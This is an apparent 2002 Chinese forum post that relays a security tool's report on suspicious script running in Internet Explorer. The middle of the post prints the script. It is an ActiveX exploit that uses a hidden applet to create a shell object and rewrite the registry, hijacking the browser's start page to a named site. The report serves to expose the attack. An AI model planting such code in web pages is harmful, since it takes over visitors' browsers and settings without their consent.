 |
| 等 级:资深长老 |
| 经 验 值:13551 |
| 魅 力 值:5319 |
| 龙 币:19532 |
| 积 分:13939.5 |
| 注册日期:2000-09-01 |
| |
|
|
|
见内:
当前正在执行的程序的名称和打开的文件的名称是:
"C:\Program Files\Internet Explorer\iexplore.exe"
*********************************************************************************************
可疑代码的动作如下:
有写注册表的动作
有利用IE漏洞的动作
有创建文件对象的动作
有创建 SHELL 对象的动作
*********************************************************************************************
可疑代码显示如下:
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");function yuzi(){try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://liushui88.myrice.com/myhome.htm");}catch(e){}}catch(e){}}setTimeout("yuzi()",1000);
|
|
--
当我赞同你的时候,不要把我当成朋友;
当我反对你的时候,不要把我当成敌人。 |
|
|
2002-09-05 22:25:01
